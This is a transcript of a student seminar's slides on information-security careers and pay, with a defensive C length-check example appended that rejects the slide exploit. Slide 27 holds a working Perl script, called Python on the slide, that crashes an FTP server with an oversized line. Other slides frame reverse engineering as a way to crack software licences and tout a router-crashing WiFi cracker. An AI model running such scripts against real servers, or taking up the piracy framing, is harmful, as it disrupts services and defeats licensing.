Beyond Ethical Hacking By Nipun Jaswal , CSA HCF Infosec Pvt. Ltd

Presentation on topics beyond conventional ethical hacking; discusses job factors and scope in the security field :) This was presented at LPU (Lovely Professional University) as a seminar with over 200 attendees. Meet me at FB if you want it: fb/nipun.jaswal

Transcript

  • 1. Life Beyond Ethical Hacking: “The Actual Information Security”. By: Nipun Jaswal (CSA, HCF Infosec Pvt. Ltd.)
  • 2. Acknowledgements: Dr. H.S Johal, Ms. Himanshi
  • 3. Lil About Myself
      • Certified with C|EH, CISE, AFCEH
      • Associated with over 9 companies
      • Ambassador, EC-COUNCIL
      • Creator of India’s first DLP on Web Application Penetration Testing course
      • Student @ LPU
      • Tested over 90+ servers
      • Currently working as Chief Security Analyst at HCF Infosec Pvt. Ltd
  • 4. Let’s Go Old School: What is Ethical Hacking? Breaking into devices and networks legally. Securing servers, recovering emails, etc. But the question remains: where to get these jobs?
  • 5. Jobs And Stats
  • 6. Why More Jobs and Less People?
      • Emerging technology
      • Still register work
      • Don’t want to spend money
      • Find it too difficult
      • People feel they can learn hacking in a 2-day workshop :-P
      • No proper facilities for required courses
  • 7. Salary Packages
      • Normal B.Tech: 300K-400K
      • BPO: 100K-250K
      • Development: 300K-700K
      • Security: 600K-1300K
  • 8. Beyond So-Called “Ethical Hacking”
      • Web Application Penetration Testing
      • Exploit Writing
      • Reverse Engineering
      • Malware Analysis
      • Computer Forensics
      • Protocol Analysis
  • 9. Why To Go Beyond Ethical Hacking? Jobs for an ethical hacker: Trainer, Trainer, Trainer, Trainer and Trainer. Salary around: 15K + incentives
  • 10. Jobs Beyond Ethical Hacking. Jobs for hackers: Researchers, Technical Heads, Penetration Testers, Forensic Investigators. Salary around: 300-400K per month
  • 11. Benefits of not Being a Hacker
  • 12. Benefits of Being a Hacker: I M UR WORST NIGHTMARE :-P
  • 13. How To Let Your Dreams Come True? Some Highly Paid Fields:
      • WAPT: involves testing of web applications, websites, servers, and source code auditing.
      • Exploit Writing: finding vulnerabilities in software and possibly exploiting the software.
      • Reverse Engineering: software cracking, patches, modifying features of an end product.
  • 14. How To Let Your Dreams Come True? Some Highly Paid Fields:
      • Wireless Testing: involves network security infrastructure build-up, managing networks, system administration, etc.
      • Projects: Good at coding? Show it to the whole world.
      • Forensics: highest paid job in the entire list. Takes a lot, and pays a lot.
  • 15. Why We Need More People ? Source: Indian Express
  • 16. Why We Need More People ? Source: Times Of India
  • 17. Host Gator Hacked !! 3 Lac Websites Owned By Hackers Source: SoftPedia
  • 18. Host Gator Hacked !! 3 Lac Websites Owned By Hackers Contd.. Source: Private
  • 19. Norton India Hacked !! Source: Private
  • 20. Norton India’s Database Hacked !! Source: Private
  • 21. Norton India’s Database Hacked !! Source: Private
  • 22. The Biggest Of All… Anonymous!! Source: National Post
  • 23. Now Beyond The Word ‘Ethical’: Web Application Penetration Testing
      • Find bugs in web applications: custom-made and open source applications.
      • Bugs which may compromise the security, make it vulnerable, and help an attacker steal sensitive information.
      • Now, how to perform 1 out of 300 tests in a web application pen-test?
      • Let’s see a simple example: SQL Injection Bypass
  • 24. Rise Of The Web Applications
  • 25. Fasten Your Seat Belts, It’s Showtime: DEMO
  • 26. Now Beyond The Word ‘Ethical’: Exploit Writing
      • Potentially writing code to exploit a vulnerability.
      • Highly paid. Software is vulnerable to exploits, which may further lead to compromise of the entire system.
      • Requirement: C, C++, Perl, Python, Ruby, Assembly language
  • 27. Now Beyond The Word ‘Ethical’: Simplest of The Exploit in Python - Crashing A Secure Port FTP Server

      use strict;
      use Socket;

      # Payload: 1000 'A' (0x41) bytes
      my $junk  = "\x41" x 1000;
      # Target host and port, overridable from the command line
      my $host  = shift || '192.168.15.1';
      my $port  = shift || 200;
      my $proto = getprotobyname('tcp');
      my $iaddr = inet_aton($host);
      my $paddr = sockaddr_in($port, $iaddr);

      print "[+] Setting up socket\n";
      socket(SOCKET, PF_INET, SOCK_STREAM, $proto) or die "socket: $!";
      print "[+] Connecting to $host on port $port\n";
      connect(SOCKET, $paddr) or die "connect: $!";
      print "[+] Sending payload\n";
      # One oversized line, terminated by a newline
      print SOCKET $junk . "\n";
      print "[+] Payload sent\n";
      close SOCKET or die "close: $!";

  • 29. Now Beyond The Word ‘Ethical’ Prices for Various Exploits
  • 30. Now Beyond The Word ‘Ethical’: Reverse Engineering
      • Editing the final software to find serial keys, stop the online authentications
      • Mostly used by pirates
      • Sometimes used to edit the features of a final software
      • Make your life easier with free products
  • 31. Now Beyond The Word ‘Ethical’: Wireless Penetration Testing
      • Involves auditing of network security over wireless
      • Installation of servers and security devices
      • Crack-proofing wireless passwords
      • Highly paid
      • Requires networking background
  • 32. INSANITY WIFI CRACKER: Insanity Wi-fi Cracker
      • Developed by me and my friends for a minor project
      • Automates the cracking of various wifi securities
      • Performs self MITM attack
      • DOS Service Can Crash the Routers For Ever :-P
      • Even an 8-year-old can press the button ‘c’ for cracking and no. for a particular AP to crack
  • 33. Wi-fi Cracking At a Click Of a Button DEMO
  • 34. So, One Last Question: Wanna go this?
  • 35. Or Wanna Go This?
  • 36. After All, It’s your Career |Handle it with care|
  • 37. Any Questions?
  • 38. Contact
      • Email: info@nipunjaswal.com
      • www.nipunjaswal.com
      • www.facebook.com/nipun.jaswal
      • www.hatcon.in
      • www.hcf.co.in
      • www.starthack.com
      • www.cyber-rog.com/h3ll
      • www.pentest.co.in
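
Added example, not from the slides: the server-side length check that turns slide 27's 1000-byte line into a rejected command, assuming the crash comes from a command line copied into a fixed buffer without a bound. `read_command`, `CMD_MAX`, the two `check_*` helpers and their inputs are hypothetical names and constructed data.

```c
#include <stdio.h>
#include <string.h>

#define CMD_MAX 512 /* assumed cap on one command line, CRLF included */
enum { CMD_OK = 0, CMD_INCOMPLETE = 1, CMD_TOO_LONG = -1 };

/* Copy one '\n'-terminated command into out only if the whole line fits. */
int read_command(const char *in, size_t len, char *out, size_t cap, size_t *used)
{
    size_t limit = len < CMD_MAX ? len : CMD_MAX;
    const char *nl = memchr(in, '\n', limit);
    *used = 0;
    if (nl == NULL) /* no terminator inside the cap: reject, or wait */
        return len >= CMD_MAX ? CMD_TOO_LONG : CMD_INCOMPLETE;
    size_t n = (size_t)(nl - in); /* line length without '\n' */
    *used = n + 1;
    if (n > 0 && in[n - 1] == '\r') /* FTP lines end in CRLF */
        n--;
    if (n + 1 > cap) /* need room for the terminating NUL */
        return CMD_TOO_LONG;
    memcpy(out, in, n);
    out[n] = '\0';
    return CMD_OK;
}

/* Constructed input: the slide's payload, 1000 'A' bytes plus '\n'. */
int check_slide_payload(void)
{
    char junk[1001], cmd[128];
    size_t used;
    memset(junk, 'A', 1000);
    junk[1000] = '\n';
    return read_command(junk, sizeof junk, cmd, sizeof cmd, &used);
}

/* Constructed input: an ordinary login command; returns 1 if parsed. */
int check_normal_command(void)
{
    const char line[] = "USER anonymous\r\n";
    char cmd[128];
    size_t used;
    int st = read_command(line, sizeof line - 1, cmd, sizeof cmd, &used);
    return st == CMD_OK && used == 16 && strcmp(cmd, "USER anonymous") == 0;
}

int main(void)
{
    printf("%d %d\n", check_slide_payload(), check_normal_command());
    return 0;
}
```

A caller that gets `CMD_TOO_LONG` should answer with an error reply and drop the connection rather than keep buffering.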